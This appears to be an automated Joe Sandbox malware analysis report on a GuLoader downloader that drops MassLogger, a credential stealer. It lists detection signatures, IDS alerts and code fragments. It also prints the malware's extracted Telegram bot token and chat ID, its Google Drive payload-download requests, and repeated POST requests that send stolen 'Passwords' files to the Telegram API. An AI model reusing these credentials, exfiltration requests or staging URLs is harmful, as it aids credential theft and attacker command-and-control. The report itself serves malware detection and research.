Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
9Yn5tjyOgT.exe

Overview

General Information

Sample name:9Yn5tjyOgT.exe
renamed because original name is a hash value
Original sample name:927c3960a7d3c785ff7de3e89215dd9a895f27b2646011e34739201805b2b501.exe
Analysis ID:1588203
MD5:1e1fb3e8d33ab075679a645f298d4715
SHA1:7dfe4d33d1d8e61cf586a71d1aab1c02e2ab4cdf
SHA256:927c3960a7d3c785ff7de3e89215dd9a895f27b2646011e34739201805b2b501
Tags:exeGuLoaderuser-adrian__luca
Infos:

Detection

GuLoader, MassLogger RAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected MassLogger RAT
Yara detected Telegram RAT
AI detected suspicious sample
Disable Task Manager(disabletaskmgr)
Disables CMD prompt
Disables the Windows task manager (taskmgr)
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w10x64
  • 9Yn5tjyOgT.exe (PID: 6208 cmdline: "C:\Users\user\Desktop\9Yn5tjyOgT.exe" MD5: 1E1FB3E8D33AB075679A645F298D4715)
    • 9Yn5tjyOgT.exe (PID: 6068 cmdline: "C:\Users\user\Desktop\9Yn5tjyOgT.exe" MD5: 1E1FB3E8D33AB075679A645F298D4715)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"C2 url": "https://api.telegram.org/bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendMessage"}
{"EXfil Mode": "Telegram", "Telegram Token": "7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA", "Telegram Chatid": "2065242915"}
SourceRuleDescriptionAuthorStrings
00000006.00000002.3432675851.0000000036E4B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
    00000006.00000002.3432675851.0000000036E4B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000006.00000002.3432675851.0000000036E4B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        00000000.00000002.2773955750.00000000070E9000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          00000006.00000002.3405749429.0000000005439000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
            Click to see the 3 entries
            No Sigma rule has matched
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-10T22:40:30.359018+010020577441Malware Command and Control Activity Detected192.168.2.649989149.154.167.220443TCP
            2025-01-10T22:40:32.242467+010020577441Malware Command and Control Activity Detected192.168.2.649991149.154.167.220443TCP
            2025-01-10T22:40:33.909239+010020577441Malware Command and Control Activity Detected192.168.2.649993149.154.167.220443TCP
            2025-01-10T22:40:36.421921+010020577441Malware Command and Control Activity Detected192.168.2.649995149.154.167.220443TCP
            2025-01-10T22:40:39.076465+010020577441Malware Command and Control Activity Detected192.168.2.649997149.154.167.220443TCP
            2025-01-10T22:40:41.661508+010020577441Malware Command and Control Activity Detected192.168.2.650000149.154.167.220443TCP
            2025-01-10T22:40:49.269816+010020577441Malware Command and Control Activity Detected192.168.2.650003149.154.167.220443TCP
            2025-01-10T22:40:58.055062+010020577441Malware Command and Control Activity Detected192.168.2.650006149.154.167.220443TCP
            2025-01-10T22:41:05.200346+010020577441Malware Command and Control Activity Detected192.168.2.650008149.154.167.220443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-10T22:40:21.452271+010028032742Potentially Bad Traffic192.168.2.649987132.226.247.7380TCP
            2025-01-10T22:40:29.437077+010028032742Potentially Bad Traffic192.168.2.649987132.226.247.7380TCP
            2025-01-10T22:40:31.358603+010028032742Potentially Bad Traffic192.168.2.649990132.226.247.7380TCP
            2025-01-10T22:40:33.014815+010028032742Potentially Bad Traffic192.168.2.649992132.226.247.7380TCP
            2025-01-10T22:40:35.639978+010028032742Potentially Bad Traffic192.168.2.649994132.226.247.7380TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-10T22:40:10.368402+010028032702Potentially Bad Traffic192.168.2.649984142.250.185.78443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-10T22:40:30.099611+010018100081Potentially Bad Traffic192.168.2.649989149.154.167.220443TCP
            2025-01-10T22:40:31.946248+010018100081Potentially Bad Traffic192.168.2.649991149.154.167.220443TCP
            2025-01-10T22:40:33.604776+010018100081Potentially Bad Traffic192.168.2.649993149.154.167.220443TCP
            2025-01-10T22:40:36.204461+010018100081Potentially Bad Traffic192.168.2.649995149.154.167.220443TCP
            2025-01-10T22:40:38.712435+010018100081Potentially Bad Traffic192.168.2.649997149.154.167.220443TCP
            2025-01-10T22:40:41.188866+010018100081Potentially Bad Traffic192.168.2.650000149.154.167.220443TCP
            2025-01-10T22:40:48.901304+010018100081Potentially Bad Traffic192.168.2.650003149.154.167.220443TCP
            2025-01-10T22:40:57.772086+010018100081Potentially Bad Traffic192.168.2.650006149.154.167.220443TCP
            2025-01-10T22:41:04.896089+010018100081Potentially Bad Traffic192.168.2.650008149.154.167.220443TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: 9Yn5tjyOgT.exeAvira: detected
            Source: 00000006.00000002.3432675851.0000000036E4B000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA", "Telegram Chatid": "2065242915"}
            Source: 9Yn5tjyOgT.exe.6068.6.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendMessage"}
            Source: 9Yn5tjyOgT.exeVirustotal: Detection: 76%Perma Link
            Source: 9Yn5tjyOgT.exeReversingLabs: Detection: 65%
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

            Location Tracking

            barindex
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 6_2_36B8D1EC CryptUnprotectData,6_2_36B8D1EC
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 6_2_36B8D9D9 CryptUnprotectData,6_2_36B8D9D9
            Source: 9Yn5tjyOgT.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.6:49988 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.6:49984 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.185.129:443 -> 192.168.2.6:49985 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49989 version: TLS 1.2
            Source: 9Yn5tjyOgT.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 0_2_0040672B FindFirstFileW,FindClose,0_2_0040672B
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 0_2_00405AFA CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405AFA
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 0_2_00402868 FindFirstFileW,0_2_00402868
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 6_2_00402868 FindFirstFileW,6_2_00402868
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 6_2_0040672B FindFirstFileW,FindClose,6_2_0040672B
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 6_2_00405AFA CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,6_2_00405AFA
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 4x nop then jmp 36B8C985h6_2_36B8C638
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 4x nop then jmp 36B81042h6_2_36B80C28
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 4x nop then jmp 36B80671h6_2_36B803AF
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 4x nop then jmp 36B8E198h6_2_36B8DEE1
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 4x nop then jmp 36B8EA48h6_2_36B8E790
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 4x nop then jmp 36B81042h6_2_36B80F6F
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 4x nop then jmp 36B8B791h6_2_36B8B4EC
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 4x nop then jmp 36B81042h6_2_36B80C1A
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 4x nop then jmp 36B8C041h6_2_36B8BD88
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 4x nop then jmp 36B8DD40h6_2_36B8DA89
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 4x nop then jmp 36B8EEA0h6_2_36B8EBF2
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 4x nop then jmp 36B8E5F0h6_2_36B8E347
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 4x nop then jmp 36B8B339h6_2_36B8B07F
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 4x nop then jmp 36B8F2F8h6_2_36B8F042
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 4x nop then jmp 36B8C499h6_2_36B8C1F2
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 4x nop then jmp 36B8BBE9h6_2_36B8B930
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 4x nop then push 00000000h6_2_3958BDF0
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 4x nop then jmp 3958882Dh6_2_39588650
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 4x nop then jmp 395891B7h6_2_39588650
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 4x nop then jmp 395823B0h6_2_39582108
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 4x nop then push 00000000h6_2_3958C92F
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h6_2_39588193
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 4x nop then jmp 39582C60h6_2_395829B8
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 4x nop then jmp 39581B00h6_2_39581858
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 4x nop then jmp 39587318h6_2_39587070
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 4x nop then jmp 39584ACAh6_2_39584820
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h6_2_39587B4F
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h6_2_39588373
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 4x nop then jmp 39586610h6_2_39586368
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 4x nop then jmp 39583DC0h6_2_39583B18
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 4x nop then jmp 39584670h6_2_395843C8
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]6_2_3958CBE7
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 4x nop then jmp 39583510h6_2_39583268
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 4x nop then jmp 395854B0h6_2_39585208
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 4x nop then jmp 39585D60h6_2_39585AB8
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 4x nop then jmp 39582808h6_2_39582560
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 4x nop then jmp 39585058h6_2_39584DB0
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 4x nop then jmp 39586EC0h6_2_39586C18
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 4x nop then jmp 395816A8h6_2_39581400
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 4x nop then jmp 39587770h6_2_395874C8
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 4x nop then jmp 39581F58h6_2_39581CB0
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 4x nop then jmp 39584218h6_2_39583F70
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 4x nop then jmp 395861B8h6_2_39585F10
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 4x nop then jmp 39586A68h6_2_395867C0
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 4x nop then jmp 39581250h6_2_39580FA8
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 4x nop then jmp 39585908h6_2_39585660
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 4x nop then jmp 395830B8h6_2_39582E10
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 4x nop then jmp 39583968h6_2_395836C0
            Source: C:\Users\user\Desktop\9Yn5tjyOgT.exeCode function: 4x nop then push 00000000h6_2_399DE7C8

            Networking

            barindex
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.6:50000 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.6:50000 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.6:49997 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.6:49997 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.6:50006 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.6:50006 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.6:49995 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.6:49993 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.6:49995 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.6:49991 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.6:49993 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.6:49991 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.6:50008 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.6:50008 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.6:50003 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.6:50003 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.6:49989 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.6:49989 -> 149.154.167.220:443
            Source: unknownDNS query: name: api.telegram.org
            Source: unknownDNS query: name: api.telegram.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31957da5bf21Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31a904c55497Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31bb19a83e14Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31d834762ebcHost: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd31f3cdf768dbHost: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd320f49a41694Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd326264810fe1Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd32c1c1e4108dHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd3195926fe3f3Host: api.telegram.orgContent-Length: 1090
            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
            Source: Joe Sandbox ViewIP Address: 104.21.32.1 104.21.32.1
            Source: Joe Sandbox ViewIP Address: 132.226.247.73 132.226.247.73
            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49990 -> 132.226.247.73:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49992 -> 132.226.247.73:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49994 -> 132.226.247.73:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49987 -> 132.226.247.73:80
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.6:49984 -> 142.250.185.78:443
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1DSjlwqeKQZa9GEZPUUl4uS5KIqgLbDi_ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1DSjlwqeKQZa9GEZPUUl4uS5KIqgLbDi_&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.6:49988 version: TLS 1.0
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1DSjlwqeKQZa9GEZPUUl4uS5KIqgLbDi_ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1DSjlwqeKQZa9GEZPUUl4uS5KIqgLbDi_&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
